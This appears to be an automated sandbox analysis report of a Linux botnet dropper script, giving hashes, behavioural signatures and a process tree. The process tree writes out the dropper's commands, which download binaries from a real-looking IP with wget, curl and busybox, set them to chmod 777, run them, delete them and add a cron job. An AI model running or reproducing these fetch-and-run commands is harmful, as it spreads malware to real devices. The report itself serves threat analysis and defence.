Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-11-2024 19:56
Static task
static1
Behavioral task
behavioral1
Sample
QR71Y_bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
QR71Y_bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
QR71Y_bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
QR71Y_bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
QR71Y_bins.sh
-
Size
10KB
-
MD5
1af48b59e54a461d801c58a2e6f2853e
-
SHA1
d8ce0cc7e067bbcc17e7f02651135515cac789e0
-
SHA256
8d6701b66f6d5e2f19a450e764fd9f305021b2504b7e9ef41c1800ac442549af
-
SHA512
984eab328dd823233835ab7ec678a632f3ad7671948c58ee5dceba6e0045e15f937a944c47263608dde996c12ab3284cb1230616d9e179db3332f0612c898eab
-
SSDEEP
96:FhFtmK6NFXTn4C+dwkev3JSIxj4P8wkev3JUIxCI5mK6NFtdf42BhF3Cci:8Tn4C+dwkev3JSKFwkev3J4W
Malware Config
Signatures
-
Contacts a large (2050) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodpid Process 764 chmod 790 chmod 696 chmod 736 chmod -
Executes dropped EXE 4 IoCs
Processes:
hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATNh8thNalBVsVsZGzxShbyd3BrADft88FHF5qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t32nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1ioc pid Process /tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN 697 hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN /tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5 737 h8thNalBVsVsZGzxShbyd3BrADft88FHF5 /tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3 766 qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3 /tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 791 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 -
Renames itself 1 IoCs
Processes:
2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1pid Process 792 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.ZUdQk6 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 4 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1curlcurlcrontabdescription ioc Process File opened for reading /proc/879/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/945/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/self/auxv curl File opened for reading /proc/5/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/23/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/112/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/843/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/875/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1017/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1041/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1044/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/891/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/910/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/3/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/170/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/652/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/803/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/850/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/870/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/969/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/960/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1054/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1065/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/172/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/897/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/908/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/925/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/982/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1000/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/111/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/881/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/959/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/998/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1062/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/self/auxv curl File opened for reading /proc/157/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/610/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/799/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/851/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/937/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/929/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/988/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/17/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/804/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/981/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1056/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1068/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/802/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/815/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/816/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/818/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/887/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1039/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/956/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/964/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1016/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/987/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/1028/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/filesystems crontab File opened for reading /proc/26/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/304/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/852/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/913/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 File opened for reading /proc/971/cmdline 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxwgetwgetcurlwgetcurlbusyboxbusyboxbusyboxcurldescription ioc Process File opened for modification /tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5 wget File opened for modification /tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5 curl File opened for modification /tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5 busybox File opened for modification /tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3 wget File opened for modification /tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 wget File opened for modification /tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 curl File opened for modification /tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN wget File opened for modification /tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN curl File opened for modification /tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1 busybox File opened for modification /tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3 busybox File opened for modification /tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN busybox File opened for modification /tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3 curl
Processes
-
/tmp/QR71Y_bins.sh/tmp/QR71Y_bins.sh1⤵PID:660
-
/bin/rm/bin/rm bins.sh2⤵PID:662
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN2⤵
- Writes file to tmp directory
PID:668
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:689
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN2⤵
- Writes file to tmp directory
PID:693
-
-
/bin/chmodchmod 777 hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN2⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN./hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN2⤵
- Executes dropped EXE
PID:697
-
-
/bin/rmrm hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN2⤵PID:700
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/h8thNalBVsVsZGzxShbyd3BrADft88FHF52⤵
- Writes file to tmp directory
PID:702
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/h8thNalBVsVsZGzxShbyd3BrADft88FHF52⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:715
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/h8thNalBVsVsZGzxShbyd3BrADft88FHF52⤵
- Writes file to tmp directory
PID:728
-
-
/bin/chmodchmod 777 h8thNalBVsVsZGzxShbyd3BrADft88FHF52⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5./h8thNalBVsVsZGzxShbyd3BrADft88FHF52⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm h8thNalBVsVsZGzxShbyd3BrADft88FHF52⤵PID:741
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t32⤵
- Writes file to tmp directory
PID:743
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t32⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t32⤵
- Writes file to tmp directory
PID:756
-
-
/bin/chmodchmod 777 qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t32⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3./qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t32⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t32⤵PID:768
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H12⤵
- Writes file to tmp directory
PID:769
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H12⤵
- Writes file to tmp directory
PID:789
-
-
/bin/chmodchmod 777 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H12⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1./2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H12⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:791 -
/bin/shsh -c "crontab -l"3⤵PID:793
-
/usr/bin/crontabcrontab -l4⤵PID:794
-
-
-
/bin/shsh -c "crontab -"3⤵PID:795
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:796
-
-
-
-
/bin/rmrm 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H12⤵PID:798
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tVUZen854UwlSjqMByJgMVogO5RprLxy9j2⤵PID:801
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
117KB
MD5849fa04ef88a8e8de32cb2e8538de5fe
SHA1c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA2568bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA5122d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf
-
Filesize
111KB
MD5ca897a38f23ec23521ce0b1b83f8422d
SHA1b8d2ab335346aba9a72bae0fe3533aca1ab7b66a
SHA256043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832
SHA51210d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
210B
MD5eacdb5a7033a9cea38bd0dae7e46257b
SHA1951d74ba784a06ef1caa66ddf8e3571d8bc67ade
SHA2568783001d3c8d5ac712742669aa37857accd9ba3c69818c70dc90e523efaeb9cf
SHA51227afd913752114702e5784a9630f0fcaf0676d8d0cabf7ccf38b2569ac417223c0fd8dd4ceaaea9aad717db240533f432185ae17784ebc561e0491d373053e20